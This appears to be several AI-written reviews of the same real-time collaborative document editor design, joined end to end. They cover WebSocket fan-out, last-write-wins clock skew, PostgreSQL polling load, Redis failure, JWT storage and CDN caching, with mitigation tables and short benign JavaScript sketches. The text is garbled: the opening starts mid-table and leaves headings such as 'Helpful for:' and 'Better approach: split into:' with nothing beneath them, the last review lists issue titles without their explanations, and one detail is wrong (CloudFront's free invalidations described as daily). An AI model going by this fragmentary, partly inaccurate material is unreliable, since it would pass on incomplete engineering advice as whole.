| CloudFront caches API responses for 5 minutes | Users see stale docs; worse, private doc responses may leak if cache key is wrong | Cache only static assets at CDN. Mark doc/auth APIs Cache-Control: no-store, private; never cache personalized document GETs unless extremely carefully keyed | Higher origin load |
| Cached auth/permission responses | User still sees access after revoke or gets stale 403 | Don’t CDN-cache auth-sensitive APIs | Same as above |
| Raw HTML in collaborative docs | Stored XSS, reflected XSS, token theft, account compromise | Use a structured doc model, sanitize pasted/imported HTML, sanitize render/export path | Sanitization costs CPU and may strip some content |
| Abuse / flooding | One client can spam edits and DoS server/DB | Rate-limit per user/document/IP; cap message size and frequency | Must avoid harming legitimate bulk paste/editing |
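The `Cache-Control: no-store` fix above can be sketched as a framework-agnostic helper; the `setHeader` shape matches Node's `http.ServerResponse` (and Express), but the helper name is an assumption:

```typescript
// Marks live-document and auth-sensitive responses as uncacheable so
// no CDN or shared proxy retains them.
interface HeaderWriter {
  setHeader(name: string, value: string): void;
}

function markUncacheable(res: HeaderWriter): void {
  // no-store: never cache anywhere; "private" is redundant alongside
  // no-store but harmless for older intermediaries.
  res.setHeader("Cache-Control", "no-store, private");
  res.setHeader("Pragma", "no-cache"); // legacy HTTP/1.0 caches
}
```

Applied as middleware on every document and auth route, this shifts that traffic back to the origin, which is the stated trade-off.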
| Issue | Failure mode | Specific fix | Trade-offs |
|---|---|---|---|
| Node.js single event loop per server | Large snapshots, JSON parsing, or one hot room can stall all sockets on that instance | Isolate collaboration into its own service/processes; use worker threads for heavy tasks | More services / ops |
| WebSocket connection imbalance | Round-robin at connect time doesn’t reflect active room load; one server gets hot docs | Balance by document ownership, not just connection count | Needs routing layer |
| Memory growth from room state + send buffers | Many active docs and slow clients can OOM a node | Bounded room state, bounded send queues, room eviction, snapshot+replay | More complexity |
| Protocol incompatibility during deploys | New servers send op formats old clients can’t apply | Version your protocol and maintain a compatibility window | Slower rollout cleanup |
This does not solve the main problems:
Better approach: split into:
Helpful for:
Not helpful for:
Good for tenant isolation, bad for load balance if one org is huge. Collaboration hotspots are usually by document, not org.
A practical production design looks like this:
Client fetches document snapshot + revision, e.g. docRevision = 18427.

Client opens WebSocket to collaboration service and sends subscribe(docId, fromRevision=18427).

Collaboration owner is authoritative for that doc
Each accepted op is durably appended
Fanout comes from the op stream
Snapshots are periodic optimization
Security
If you don’t want a full redesign immediately, do these first:
If you want, I can also turn this into:
Below is a system‑level failure‑mode / race‑condition / scaling‑bottleneck map for the architecture you described, followed by a concrete mitigation (or redesign) for each item together with the main trade‑offs to consider.
I grouped the items by the logical layer they belong to, because many of the problems cascade from one layer to the next.
| # | Issue (Failure Mode / Race Condition) | Why it Happens / Impact | Mitigation / Solution | Trade‑offs |
|---|---|---|---|---|
| 1.1 | WebSocket connection loss (client disconnect, server crash, LB timeout) | Client stops receiving updates → stale view, possible data loss if local edits are not flushed. | • Use sticky sessions (source‑IP affinity) or a centralized WebSocket broker (e.g., Redis Pub/Sub, NATS, or a dedicated socket‑server cluster with a shared connection registry). <br>• Implement client‑side reconnection with exponential back‑off and message replay (store last N operations per document in Redis). | Sticky sessions limit load‑balancer flexibility; a broker adds extra hop and operational cost but gives true fan‑out and fail‑over. |
| 1.2 | Server‑side broadcast limited to “that server” | Changes made on Server A are not pushed to clients attached to Server B until the 2‑second poll. This creates visible latency spikes and can cause out‑of‑order delivery. | Replace polling with event‑driven publish/subscribe: every server publishes its change to a Redis channel (or Kafka topic) and all servers subscribe. The broadcast becomes instantaneous and ordering can be enforced per‑document. | Requires a reliable message broker and handling of broker failures; adds a small memory footprint for the channel. |
| 1.3 | Polling every 2 s on every API server | As the number of servers grows, the aggregate read load on PostgreSQL scales linearly. With 50 servers you have 25 RPS of full‑table scans (or at least index scans). This quickly saturates the primary or read replicas. | • Switch to logical replication or LISTEN/NOTIFY in PostgreSQL so that changes are pushed to listeners. <br>• Or use Change Data Capture (CDC) with Debezium/Kafka Connect to stream row‑level changes. | Requires extra infrastructure (Kafka, Debezium) but eliminates wasteful polling. LISTEN/NOTIFY works only for modest traffic; CDC scales better. |
| 1.4 | Last‑write‑wins (LWW) with client‑provided timestamps | Clock skew (malicious or mis‑configured client) can overwrite newer edits, leading to data loss. Also, concurrent edits to the same paragraph can be silently discarded. | • Move to operational transformation (OT) or conflict‑free replicated data type (CRDT) algorithms that resolve conflicts based on intent, not on timestamps. <br>• If LWW must stay, replace client timestamps with server‑generated monotonic sequence numbers (e.g., a per‑document incrementing counter stored in Redis). | OT/CRDT adds algorithmic complexity and higher CPU per edit; server‑generated sequence numbers require a fast, strongly consistent counter (Redis INCR is cheap). |
| 1.5 | Duplicate or out‑of‑order messages (network jitter, retries) | Client may apply the same edit twice or apply an older edit after a newer one, corrupting the document state. | • Make every edit idempotent (include a UUID; server deduplicates). <br>• Use per‑document version numbers; server rejects edits with a version ≤ current version. | Version check forces the client to keep the latest version, slightly increasing client state size. |
| 1.6 | WebSocket connection‑count limits (ulimit, OS socket limits) | A single API server can only hold a few tens of thousands of concurrent sockets before hitting OS limits, causing new connections to be refused. | • Scale out the socket layer (more servers) and raise OS limits (net.core.somaxconn, file‑descriptor ulimit). <br>• Use a gateway such as AWS API Gateway WebSocket or Cloudflare Workers that terminates the socket and forwards messages via HTTP/2 to backend workers. | Raising OS limits is cheap but requires proper monitoring; a managed gateway removes socket‑scale concerns but adds latency and cost. |
| 1.7 | Message size explosion (full HTML snapshot every 30 s) | If many users edit a large document, a 30‑second snapshot can be several MBs, overwhelming both DB write bandwidth and network. | • Store incremental diffs (e.g., Quill Delta, JSON‑Patch) instead of full snapshots. <br>• Keep the full snapshot only in a cold‑storage bucket (S3) and keep a rolling delta log in Redis/Postgres for fast recovery. | Diff generation adds CPU; you need a compaction job to periodically coalesce deltas into a new full snapshot. |
| 1.8 | Back‑pressure on the server (burst of edits) | A sudden spike (e.g., copy‑paste of a large block) can flood the Node.js event loop, leading to increased latency or dropped messages. | • Use write‑through queue (e.g., BullMQ backed by Redis) to serialize writes to Postgres. <br>• Apply rate‑limiting per user (tokens per second). | Queue introduces additional latency (few ms) but protects the event loop. Rate‑limiting may affect power users. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 2.1 | Round‑robin LB without session affinity → a user’s WebSocket may be re‑routed mid‑session (if LB re‑balances). | The client loses its open socket and must reconnect; any in‑flight edits are lost. | Enable sticky sessions (source‑IP or cookie‑based) for WS endpoints, or use a layer‑7 router that forwards based on a “document‑id” hash. | Sticky sessions reduce true load‑balancing; hash‑based routing may unevenly distribute load if many users work on the same doc. |
| 2.2 | LB health‑check timeout (too aggressive) → servers are marked unhealthy while still processing edits. | Traffic shifts to fewer servers, causing overload and increased latency. | Tune health‑check interval and graceful shutdown (drain connections before marking down). | Longer health‑check periods mean slower detection of real failures. |
| 2.3 | Single point of failure for LB (no active‑active) | Entire service unavailable if LB crashes. | Deploy multiple LB instances behind a DNS‑based fail‑over (Route 53) or use a managed service (AWS ELB, Cloudflare Load Balancer). | Adds cost and DNS TTL considerations, but eliminates single point of failure. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 3.1 | Write hotspot on a single primary (every edit hits the same row → high row‑level lock contention) | As concurrency grows, the primary becomes the bottleneck; latency spikes and occasional deadlocks. | • Use partitioned tables per‑organization (already planned) and shard by document‑id across multiple PostgreSQL clusters. <br>• Apply optimistic concurrency (version column) and batch multiple edits into a single UPDATE. | Partitioning adds complexity to queries and migrations; sharding across clusters requires a routing layer. |
| 3.2 | Replica lag (read replicas used for “read‑heavy” ops) | The 2‑second poll may read stale data, causing out‑of‑date broadcasts. | • Keep read‑writes on the primary for low‑latency change detection. <br>• If replicas are needed, reduce replication delay by using synchronous replication for the latest commit or using logical replication that streams WAL in near‑real‑time. | Synchronous replication reduces write throughput; logical replication adds operational overhead. |
| 3.3 | Transaction loss on crash (no durable write‑ahead log flush) | A server crash before the DB commit can cause lost edits. | Ensure PostgreSQL fsync is enabled and use synchronous_commit = on for critical tables. | Slight performance hit (extra fsync) but guarantees durability. |
| 3.4 | Schema migration while servers are running | In‑flight edits may violate new constraints, leading to errors and possible data loss. | Adopt zero‑downtime migration patterns (add new column, back‑fill, switch, then drop old). Use feature flags on the API to toggle between schema versions. | Requires careful coordination and testing. |
| 3.5 | Full‑snapshot storage bloat | Every 30 s snapshot creates a new row; after weeks the table can be terabytes. | • TTL / archival: move snapshots older than X days to S3 and delete from DB. <br>• Compaction job: merge deltas into a new snapshot and prune old deltas. | Archival adds retrieval latency for historic versions; compaction needs additional compute. |
| 3.6 | Stored XSS via malformed client HTML | Client‑provided HTML stored unchecked can execute scripts when rendered to other collaborators. | Sanitize/escape HTML on the server, store as text, and render through a safe sanitizer (DOMPurify) on the client. | Slight CPU overhead; must keep sanitizer version in sync. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 4.1 | Redis as a single point of failure (session cache, pub/sub) | If Redis crashes, session lookup fails → forced logout; pub/sub channel lost → real‑time updates stop. | Deploy Redis Cluster (sharding + replication) or use a managed service (AWS Elasticache with Multi‑AZ). Enable persistence (AOF/RDB) for session data. | Cluster adds complexity, cross‑slot pub/sub limitations (need to use a single hash slot or a separate channel per node). |
| 4.2 | Redis pub/sub message loss (no durability) | If a server restarts while a message is in transit, that edit is never broadcast. | Switch to Redis Streams (or Kafka) which persist messages and support consumer groups with ack/replay. | Streams require consumer offset management; higher memory usage. |
| 4.3 | Cache stampede on document load (many users request same doc, cache miss) | All servers hit PostgreSQL simultaneously, causing a spike. | Use request coalescing (single flight) or early‑expire with stale‑while‑revalidate pattern. | Slightly stale data may be served for a few seconds, but read load is drastically reduced. |
| 4.4 | JWT stored in localStorage | XSS can steal the token → session hijack. | Store JWT in httpOnly Secure SameSite=Lax cookies; optionally use short‑lived access token + refresh token flow. | Cookies are sent on every request (small overhead) and need CSRF protection (SameSite mitigates most). |
| 4.5 | CloudFront caching of API responses (5 min) | Real‑time API endpoints (e.g., “GET /documents/:id”) may return stale content, causing users to see outdated snapshots. | Disable caching for any endpoint that returns mutable data, or use Cache‑Control: no‑store. If static assets only, keep CDN. | Removes CDN benefit for those endpoints (but they are low‑traffic compared to WS). |
| 4.6 | Cache invalidation race (snapshot saved, but CDN still serves older version) | Users see an older snapshot for up to 5 min. | Invalidate the CDN object programmatically after each snapshot write (CloudFront invalidation API) or use versioned URLs (e.g., /doc/123?v=timestamp). | Invalidation cost (max 1000 per day free on AWS) and extra query‑string handling; versioned URLs are cheap and more deterministic. |
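The request‑coalescing fix for 4.3 can be sketched in a few lines of Node.js‑style JavaScript. This is a minimal in‑process version; the names (`singleFlight`, `loadFromDb`) are illustrative, and a multi‑server deployment would still need a shared cache in front of it.

```javascript
// Request coalescing ("single flight"): concurrent callers asking for the
// same key share one in-flight promise, so a cache miss triggers exactly
// one database read instead of N. `loadFromDb` stands in for the real query.
const inFlight = new Map();

function singleFlight(key, loader) {
  if (inFlight.has(key)) return inFlight.get(key); // join the existing call
  const p = loader(key).finally(() => inFlight.delete(key)); // allow a fresh load later
  inFlight.set(key, p);
  return p;
}

// Demo: two concurrent requests for the same document hit the DB once.
let dbReads = 0;
const loadFromDb = async (id) => { dbReads += 1; return `doc:${id}`; };

const p1 = singleFlight("doc-42", loadFromDb);
const p2 = singleFlight("doc-42", loadFromDb); // coalesced with p1
```

Both callers receive the same promise object, so whichever resolution or rejection the loader produces is shared by everyone who joined the flight.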
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 5.1 | Long‑lived JWT (24 h) with no revocation | If a token is stolen, the attacker can act for a full day. | Switch to short‑lived access tokens (5‑15 min) plus a refresh token stored in httpOnly cookie. Implement token revocation list in Redis for immediate logout. | Requires refresh flow and extra Redis reads on each token refresh, but limits exposure. |
| 5.2 | No per‑document ACL enforcement (only org‑level) | Users from the same org could edit any document, violating fine‑grained permissions. | Embed document‑level ACL in the DB and enforce in the API before broadcasting changes. Cache ACL in Redis for fast lookup. | Slight extra DB/Redis read per edit; adds complexity to permission management UI. |
| 5.3 | JWT signed with symmetric key stored in code repo | If repo is leaked, anyone can forge tokens. | Use asymmetric RSA/ECDSA keys with the private key only on the auth service; rotate keys regularly. | Slightly larger token size, verification cost is higher but still negligible. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 6.1 | Network partition between API servers and DB | Some servers cannot write/read → local edits are lost or become inconsistent. | Deploy DB in a multi‑AZ cluster with automatic failover (Patroni, CloudSQL). Use circuit‑breaker pattern in the API to fallback to a “read‑only” mode and alert users. | Failover may cause brief write pause; circuit‑breaker adds latency when open. |
| 6.2 | NTP clock skew between clients (used for LWW) | A fast client can “win” over correct edits. | Do not trust client timestamps; generate server‑side timestamps or monotonic counters. | Removes ability for client‑side offline editing (if you need offline, you must sync and resolve later). |
| 6.3 | WebSocket payload size limits (e.g., CloudFront or ALB limits) | Large diff messages may be truncated, causing loss of edits. | Enforce max payload size on the client (e.g., 64 KB) and chunk larger changes into multiple messages. | Slightly more complex client logic. |
| 6.4 | DNS TTL mismatch for load‑balancer changes | When you add/remove API servers, clients may keep connecting to old IPs. | Keep low TTL (30 s) for the service DNS and use Service Discovery (Consul, AWS Cloud Map) for the WebSocket endpoint. | More frequent DNS queries; must ensure DNS provider supports low TTL. |
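The chunking mitigation in 6.3 might look like the sketch below. It splits by character count for simplicity (real code should measure UTF‑8 bytes), and the envelope fields (`msgId`, `seq`, `total`) are illustrative.

```javascript
// Split a large change payload into ordered parts the receiver can
// reassemble, staying under the WebSocket/proxy payload limit.
const MAX_CHUNK = 64 * 1024; // 64 KB, matching the limit suggested above

function toChunks(msgId, payload, maxChunk = MAX_CHUNK) {
  const total = Math.max(1, Math.ceil(payload.length / maxChunk));
  const chunks = [];
  for (let i = 0; i < total; i++) {
    chunks.push({
      msgId,                 // groups parts of the same logical message
      seq: i,                // position of this part
      total,                 // how many parts to expect
      data: payload.slice(i * maxChunk, (i + 1) * maxChunk),
    });
  }
  return chunks;
}

function reassemble(chunks) {
  // Sort by sequence number in case parts arrived out of order.
  return chunks
    .slice()
    .sort((a, b) => a.seq - b.seq)
    .map((c) => c.data)
    .join("");
}
```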
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 7.1 | No visibility into edit latency | You cannot detect when the 2 s polling becomes a bottleneck. | Instrument end‑to‑end latency (client → WS → DB → broadcast) with OpenTelemetry; expose alerts on > 200 ms latency. | Minor instrumentation overhead, but huge operational benefit. |
| 7.2 | No back‑pressure metrics (queue depth) | Queue overflows silently, dropping edits. | Export BullMQ queue metrics (waiting, active, completed) to Prometheus; set alerts when waiting > N. | Requires monitoring stack. |
| 7.3 | No audit log of document changes | Hard to recover from accidental overwrite. | Write append‑only audit table (or event store) with user‑id, operation, timestamp. Use partitioning to keep it performant. | Extra storage cost; can be pruned after compliance period. |
| Refactor | What it solves | Rough effort & cost |
|---|---|---|
| Replace polling + LWW with event‑driven publish/subscribe + OT/CRDT | Eliminates latency spikes, removes race conditions, provides true collaborative semantics. | Medium‑high: need to integrate OT/CRDT library, add message broker, adjust client model. |
| Move WebSocket fan‑out to a central broker (Redis Streams / NATS / Kafka) | Guarantees delivery to all servers, removes need for polling, scales linearly with users. | Medium: set up broker cluster, update servers to subscribe/publish. |
| Use server‑generated monotonic version numbers (or sequence) instead of client timestamps | Removes clock‑skew attacks and data loss from LWW. | Low: add a column, generate via Redis INCR or DB sequence. |
| Introduce short‑lived JWT + refresh token + revocation list | Improves security, limits impact of stolen tokens. | Low‑medium: change auth flow, add token refresh endpoint. |
| Shard documents across multiple PostgreSQL clusters (by org‑id) | Breaks write hotspot, improves write scalability. | High: DB provisioning, routing layer, migration scripts. |
| Persist change logs in an event store (Kafka) and generate snapshots lazily | Reduces DB write volume, enables easy replay, supports offline edits. | Medium: set up Kafka, write consumer for snapshot generation. |
| Add graceful shutdown & connection draining on API servers | Prevents abrupt loss of in‑flight edits during scaling or deployment. | Low: handle SIGTERM, stop accepting new WS, wait for active edits to finish. |
Implement these mitigations in order of impact versus effort: start with the low‑effort fixes (server‑generated version numbers, sticky sessions, JWT revocation, health‑check tuning), then move to the higher‑effort architectural changes (event‑driven propagation, OT/CRDT, sharding). The result is a robust, horizontally scalable collaborative editor that can handle real‑world traffic spikes without data loss or user‑visible conflicts.
Below is a “code‑review” of the design you posted.
I’ve broken it down into failure modes / race conditions / bottlenecks and for each one I provide a concrete fix (or set of fixes) together with the main trade‑offs you’ll pay for it.
TL;DR – The biggest problems are:
- No distributed change bus – polling + per‑server broadcast is slow, inconsistent and scales poorly.
- Client‑clock based LWW – you’ll lose edits when clocks drift or when two users edit the same paragraph.
- Write‑heavy DB – one write per keystroke + a 30 s snapshot blows up PostgreSQL.
- Sticky‑session oblivious load balancer – round‑robin can route the same user to two servers, breaking the real‑time flow.
- Security & freshness holes – JWT in localStorage + CDN caching of API responses can serve stale data or be stolen.
Below are the detailed points.
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Per‑server broadcast + 2 s polling | • Latency (2 s) before other servers see a change. <br>• Inconsistent state when two servers write different changes to the same paragraph. <br>• Polling is wasteful – DB load grows linearly with #servers. | Introduce a distributed event bus (Redis Pub/Sub, NATS, Kafka, or a custom WebSocket “hub” cluster).<br>• Backend servers publish change events to the bus.<br>• Every server subscribes and pushes the change to its local clients immediately. | • Extra component to maintain (ops, monitoring). <br>• Slightly higher latency than direct WebSocket, but bounded to a few ms. <br>• Requires idempotency handling if you use a queue that can replay messages. |
| Clients reconnect to a different server | The new server won’t have the “in‑flight” changes that were already broadcast by the old server. | Sticky sessions (session affinity) on the load balancer or client‑side reconnection logic that re‑joins the same server (e.g. via a token that encodes the server ID). | • Sticky sessions hurt horizontal scaling of the backend (one server can become a hotspot). <br>• Client reconnection logic is more complex but keeps the backend stateless. |
| Duplicate change delivery | If both polling and Pub/Sub are used, a change may be broadcast twice. | Single source of truth – remove polling entirely. | • All servers must keep a local cache of the last change ID to avoid re‑processing. |
| Network partition | If the bus goes down, changes stop propagating. | Graceful degradation – keep local change log and replay when bus recovers. | • Adds a bit of complexity; you need a durable queue. |
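The idempotency handling mentioned above (each server tracking the last change ID to avoid re‑processing replays) can be sketched as follows. It assumes change IDs are monotonically increasing per document; a real consumer would persist `lastApplied` so the dedupe state survives restarts.

```javascript
// Drop duplicate or replayed bus events: remember the highest change ID
// applied per document and only apply strictly newer ones.
const lastApplied = new Map(); // docId -> highest change id seen

function applyIfNew(event, apply) {
  const seen = lastApplied.get(event.docId) ?? -1;
  if (event.changeId <= seen) return false; // duplicate or replay: skip
  apply(event);
  lastApplied.set(event.docId, event.changeId);
  return true;
}

// Demo: the same event delivered twice is applied only once.
const applied = [];
applyIfNew({ docId: "d1", changeId: 1 }, (e) => applied.push(e.changeId));
applyIfNew({ docId: "d1", changeId: 1 }, (e) => applied.push(e.changeId)); // dropped
applyIfNew({ docId: "d1", changeId: 2 }, (e) => applied.push(e.changeId));
```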
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Last‑write‑wins based on client timestamps | • Client clocks can drift by seconds → edits from a “behind” client win.<br>• Two users editing the same paragraph simultaneously causes one edit to be silently dropped. | Operational Transformation (OT) or Conflict‑free Replicated Data Types (CRDT). <br>• Server assigns a monotonically increasing sequence number or uses a Lamport timestamp. <br>• Clients send operations (insert/delete) that can be merged deterministically. | • OT/CRDT libraries are non‑trivial to integrate and test. <br>• Larger message size (operation payload) but far more robust. |
| Optimistic concurrency control on the DB | Two writes to the same row can interleave. | Use PostgreSQL’s SELECT ... FOR UPDATE or INSERT … ON CONFLICT … UPDATE with a version column. | • Adds a small locking overhead but protects against lost updates. |
| Polling + 2 s delay | Users see a lag when another user edits the same paragraph. | Use the event bus (above) + OT/CRDT so updates are applied instantly. | • Real‑time feel improves dramatically. |
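To make the OT idea in the table concrete, here is a minimal transform for concurrent plain‑text inserts. It is deliberately tiny: production libraries (ShareDB, Yjs) also handle deletes, rich text, and undo, and the `site` tie‑breaker field is an assumption of this sketch.

```javascript
// Transform one insert against another concurrent insert so that both
// replicas converge regardless of the order they apply the operations.
function transformInsert(op, against) {
  // If the other insert landed at or before our position, our index shifts.
  if (against.pos < op.pos || (against.pos === op.pos && against.site < op.site)) {
    return { ...op, pos: op.pos + against.text.length };
  }
  return op;
}

function applyInsert(doc, op) {
  return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
}

// Two users edit "ac" concurrently:
const a = { pos: 1, text: "b", site: 1 }; // user A inserts "b" at index 1
const b = { pos: 2, text: "d", site: 2 }; // user B inserts "d" at index 2

// Site A applies its own op, then B's op transformed against A's.
const docA = applyInsert(applyInsert("ac", a), transformInsert(b, a));
// Site B applies its own op, then A's op transformed against B's.
const docB = applyInsert(applyInsert("ac", b), transformInsert(a, b));
```

Both replicas end up with the same document, which is exactly the convergence property that client‑clock LWW cannot give you.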
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| One write per keystroke | Dozens of active typists can generate hundreds of writes/sec on a hot document, and thousands across documents. PostgreSQL can’t keep up without sharding or batching. | Batch changes: buffer changes for 100–200 ms or 10 changes, then persist as a single row. <br>• Store a delta log (operation + target position). <br>• Snapshot every 30 s only if the document is actually dirty. | • Slightly more latency for the “last” change. <br>• Need to handle rollback if the batch fails (transaction). |
| Full HTML snapshot every 30 s | Two snapshots per minute at, say, 100 KB of HTML each is ~200 KB per active doc per minute; across 10k active docs that’s roughly 2 GB/min of write volume. | Store diffs instead of full snapshots. <br>• Use a text diff algorithm (e.g. diff-match-patch). <br>• Keep snapshots only for critical points (e.g. every 5 min, every 1 MB of changes). | • Slightly more CPU to compute diffs. <br>• Recovery becomes a bit more complex (apply diffs to base). |
| Single PostgreSQL instance | All writes go to one node → CPU, I/O, and connection limits. | Write‑throughput sharding: partition by document ID or org ID into multiple Postgres instances (or use a sharded cluster like Citus). <br>• Use a “write‑hot” partition for the active doc. <br>• Keep a global read replica for analytics. | • More operational overhead (multiple DBs). <br>• Must implement routing logic in the API. |
| Connection pooling | Each write opens a new DB connection. | Use a connection pool (pg‑pool). | • Standard practice; no extra cost. |
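The batching row above can be sketched like this. For determinism the sketch flushes only on a size threshold; a real batcher would also flush on a 100–200 ms timer and wrap the persisted batch in a transaction. All names here are illustrative.

```javascript
// Buffer per-document operations and flush them as one persisted row
// once a threshold is reached, turning N keystroke writes into one.
function makeBatcher(flush, maxOps = 10) {
  const buffers = new Map(); // docId -> pending ops
  return {
    push(docId, op) {
      const buf = buffers.get(docId) ?? [];
      buf.push(op);
      if (buf.length >= maxOps) {
        buffers.delete(docId);
        flush(docId, buf); // one DB write for the whole batch
      } else {
        buffers.set(docId, buf);
      }
    },
    pending: (docId) => (buffers.get(docId) ?? []).length,
  };
}

// Demo: 3 ops with a threshold of 3 trigger exactly one flush.
const flushes = [];
const batcher = makeBatcher((docId, ops) => flushes.push({ docId, count: ops.length }), 3);
batcher.push("d1", "op1");
batcher.push("d1", "op2");
batcher.push("d1", "op3");
```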
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Round‑robin without session stickiness | User’s WebSocket may be routed to Server A, but a subsequent request (e.g. HTTP API) goes to Server B, which doesn’t know the user’s state. | Sticky sessions on the load balancer (IP hash or session cookie). | • Reduces cross‑server state but can create a single point of failure. |
| No graceful failover | If a server dies, its clients lose the socket and all in‑flight edits. | Implement reconnection logic that re‑joins the same document and re‑plays any missed changes from the event bus. | • Slightly more client logic. |
| Scaling the event bus | If you use Redis Pub/Sub, Redis single‑node becomes a bottleneck. | Use Redis Cluster or Kafka (with multiple partitions per topic). | • More infrastructure but scales horizontally. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| JWT in localStorage | Vulnerable to XSS; stolen token can be used to hijack a session. | Store JWT in HttpOnly, SameSite=Lax/Strict cookie. <br>• Optionally rotate tokens or use short‑lived access tokens + refresh token in secure cookie. | • Requires CSRF protection (same‑site cookie). <br>• Slightly more round‑trips for token refresh. |
| 24‑hour expiry | User may be logged out mid‑session. | Use refresh token flow with a 14‑day refresh token + 15‑minute access token. | • Adds refresh logic. |
| CDN caching API responses | End‑points that return document data could be cached for 5 min → stale content. | Mark real‑time API routes with Cache-Control: no-store or a very short TTL. | • Nothing extra; just set headers. |
| Missing rate limiting | Attackers can flood a document with edits. | Apply per‑user / per‑doc rate limits (e.g., 10 ops/sec). | • Adds overhead but protects the system. |
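The per‑user rate limit in the last row is commonly implemented as a token bucket. A sketch with an injected clock (so the behaviour is deterministic); a production version would use `Date.now()` and keep buckets in Redis so all API servers see the same counts.

```javascript
// Token bucket: each user gets `capacity` tokens, refilled at
// `refillPerSec`; an edit is allowed only if a token is available.
function makeBucket(capacity, refillPerSec, now) {
  let tokens = capacity;
  let last = now();
  return function allow() {
    const t = now();
    tokens = Math.min(capacity, tokens + ((t - last) / 1000) * refillPerSec);
    last = t;
    if (tokens >= 1) { tokens -= 1; return true; }
    return false; // caller should reject or queue the edit
  };
}

// Demo with a fake millisecond clock:
let fakeTime = 0;
const allow = makeBucket(2, 10, () => fakeTime);
const first = allow();   // consumes token 1
const second = allow();  // consumes token 2
const third = allow();   // bucket empty -> rejected
fakeTime = 100;          // 100 ms later at 10 tokens/sec: 1 token refilled
const fourth = allow();
```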
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| No metrics | Hard to spot hot documents or slow DB writes. | Instrument WebSocket ops, DB latency, queue lag, Redis latency. Use Prometheus + Grafana. | • Extra instrumentation code. |
| No alerting | You’ll only notice after a user reports. | Alert on high error rate, queue lag, DB connection exhaustion. | • Requires ops involvement. |
| No graceful degradation | If Redis or Pub/Sub goes down, all clients lose updates. | Keep a local in‑memory buffer and replay when the bus comes back. | • Slightly more code. |
| No transaction retries | DB write fails due to transient lock. | Use retry‑on‑deadlock logic in the API. | • Adds complexity but increases reliability. |
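The retry‑on‑deadlock row might be implemented as a small wrapper. The sketch is synchronous for brevity (real DB calls would be awaited); PostgreSQL reports deadlocks with SQLSTATE `40P01`, and only that class of transient error is retried here.

```javascript
// Retry a write a bounded number of times, but only for transient
// errors; permanent failures surface immediately.
function withRetry(fn, { attempts = 3, isTransient = (e) => e && e.code === "40P01" } = {}) {
  let lastErr;
  for (let i = 0; i < attempts; i++) {
    try {
      return fn();
    } catch (err) {
      if (!isTransient(err)) throw err; // not a deadlock: don't retry
      lastErr = err;
    }
  }
  throw lastErr; // exhausted attempts
}

// Demo: a write that deadlocks twice, then succeeds on the third try.
let calls = 0;
const result = withRetry(() => {
  calls += 1;
  if (calls < 3) { const e = new Error("deadlock"); e.code = "40P01"; throw e; }
  return "committed";
});
```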
| Bottleneck | Fix | Trade‑offs |
|---|---|---|
| Per‑doc snapshot every 30 s | Store incremental diffs; only snapshot on major version or manually. | CPU for diff, complexity for replay. |
| Client‑clock based timestamps | Server‑issued operation IDs + Lamport timestamps. | Minimal extra data per message. |
| Polling + 2 s | Switch to LISTEN/NOTIFY in Postgres or logical replication to push changes. | Requires a small change‑push service; eliminates polling overhead. |
| High write contention on a single row | Use row‑level locking or CRDT that merges locally; push to DB only after a batch. | Latency for final persistence, but throughput increases. |
| Static assets being served by CDN | Good practice; no change needed. | Ensure API endpoints are excluded from CDN caching. |
| Layer | Recommendation | Reason |
|---|---|---|
| Event bus | Redis Cluster (Pub/Sub) or NATS | Fast, low‑latency, supports horizontal scaling. |
| Conflict resolution | CRDT library (e.g. Automerge, Yjs) | Already battle‑tested for collaborative editors. |
| DB | Citus (Postgres sharding) or partitioned Postgres | Keeps single‑node simplicity for small orgs, scales for large. |
| Auth | HttpOnly refresh token + short‑lived access token | XSS safe, still supports SPA. |
| WebSocket | Sticky session or client‑side reconnection to same server | Guarantees continuity. |
| Metrics | Prometheus + Grafana | Visibility into latency, error rates. |
- `Cache-Control: no-store` – avoid stale CDN data.

The current design is a classic “single‑box” real‑time editor that works for a handful of users but will break under real‑world load for the reasons detailed above.
By replacing polling with a proper event bus, adopting a proven CRDT/OT engine, batching writes, and hardening auth/session handling, you’ll get a system that scales to thousands of simultaneous collaborators while maintaining strong consistency and resilience.
Below is a comprehensive analysis of the provided architecture for the real-time collaborative document editor. I'll break it down into three main categories: failure modes, race conditions, and scaling bottlenecks. For each identified issue, I'll describe the problem in detail, propose a specific solution, and discuss the trade-offs involved.
This analysis is based on the system's design, including the frontend, backend, database, real-time handling, sync strategy, storage, authentication, and scaling plan. I've considered potential points of failure, timing-dependent behaviors, and limitations under load.
Failure modes are scenarios where components of the system fail, leading to downtime, data loss, or incorrect behavior. These can arise from hardware failures, network issues, or software bugs.
Issue 1: API Server Failure (e.g., a Node.js server crashes or becomes unreachable).
Issue 2: Database Failure (e.g., PostgreSQL goes down or experiences high latency).
Issue 3: Redis Failure (e.g., session cache is lost due to server crash or eviction).
Issue 4: WebSocket Connection Instability (e.g., network issues or client-side problems).
Issue 5: CDN Caching Invalidation (e.g., CloudFront serves stale API responses).
Issue 6: Authentication Failures (e.g., JWT token expiry or security vulnerabilities).
Race conditions occur when the outcome depends on the timing or sequence of events, leading to inconsistencies or data corruption.
Issue 1: Inaccurate Conflict Resolution Due to Client Clock Skew.
Issue 2: Delayed Propagation of Changes Across Servers.
Issue 3: Concurrent Edits on the Same Document.
Issue 4: Snapshot Overwrite During Frequent Edits.
Scaling bottlenecks are limitations that hinder the system's ability to handle increased load, such as more users or documents.
Issue 1: High Database Write Load from Frequent Changes.
Issue 2: Inefficient Polling for Changes.
Issue 3: Uneven Load Distribution with Round-Robin Load Balancing.
Issue 4: Partitioning Limitations for Large Organizations.
